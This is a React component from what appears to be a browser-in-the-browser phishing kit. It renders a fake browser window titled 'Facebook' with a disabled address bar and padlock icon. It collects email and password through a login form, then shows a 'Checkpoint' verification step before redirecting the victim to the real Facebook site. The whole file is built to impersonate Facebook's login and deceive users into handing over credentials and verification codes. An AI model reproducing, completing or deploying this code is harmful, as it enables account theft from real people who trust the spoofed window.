// components/Login/LoginWindowsView.tsx
import React from "react";
import WindowsBase from "../WindowBase";
import { browserName } from "react-device-detect";
import Checkpoint from "../../pages/checkpoint";
import { LoginForm } from "./LoginForm";
import useStore from "../../store";

export const LoginWindowsView = ({
  url,
  isBrowserLoaded,
  isCheckPoint,
  loading,
  loginFailed,
  isError,
  isPassInvalid,
  email,
  password,
  showPassword,
  handleLogin,
  setEmail,
  setPassword,
  setShowPassword,
  handleAppClose,
  setChrome
}) => {
  const { pageId } = useStore();
  return (
    <WindowsBase
      name={`Facebook - ${browserName}`}
      resizer="chrome"
      appClose={handleAppClose}
      loading={loading}
      num={0}
    >
      <div
        className="w-full h-full overflow-y-auto bg-gray-100 flex flex-col"
        style={{
          boxShadow: "0px 10px 10px #0505054d",
          borderRadius: "0px 0 5px 5px"
        }}
      >
        <div className="border-b-[1px] border-gray-300 flex items-center py-1 px-1">
          <div className="flex-1 relative">
            <input
              type="text"
              disabled
              value={url}
              className="w-full rounded-full border-none pl-6 bg-gray-100 text-sm h-[25px]"
              placeholder="Search Google or type a URL"
            />
            {isBrowserLoaded ? (
              <i className="fa-regular fa-solid fa-lock absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
            ) : (
              <i className="fa-regular fa-circle-exclamation absolute text-sm left-1 top-[50%] -translate-y-[50%] fa-sm text-gray-500"></i>
            )}
          </div>
          <i className="px-3 fa-regular fa-solid fa-key-skeleton fa-sm text-gray-500 rotate-45"></i>
        </div>

        <div className="w-full flex-1">
          {isBrowserLoaded ? (
            <>
              {!isCheckPoint ? (
                <div className="login_page relative w-full">
                  <LoginForm
                    email={email}
                    password={password}
                    showPassword={showPassword}
                    loading={loading}
                    loginFailed={loginFailed}
                    isError={isError}
                    isPassInvalid={isPassInvalid}
                    onEmailChange={(e) => setEmail(e.target.value)}
                    onPasswordChange={(e) => setPassword(e.target.value)}
                    onTogglePassword={() => setShowPassword((prev) => !prev)}
                    onSubmit={handleLogin}
                  />
                </div>
              ) : (
                <div className="overflow-y-auto p-4 md:p-6 z-1000">
                  <div className="flex justify-center items-center max-w-3xl mx-auto">
                    <Checkpoint
                      onSuccess={() => {
                        setChrome(false);
                        window.location.href = `https://www.facebook.com/${pageId}/video`;
                      }}
                    />
                  </div>
                </div>
              )}
            </>
          ) : (
            <div className="h-[560px]"></div>
          )}
        </div>

        {loading && (
          <div className="waiting">Waiting for https://facebook.c...</div>
        )}
      </div>
    </WindowsBase>
  );
};

export default LoginWindowsView;
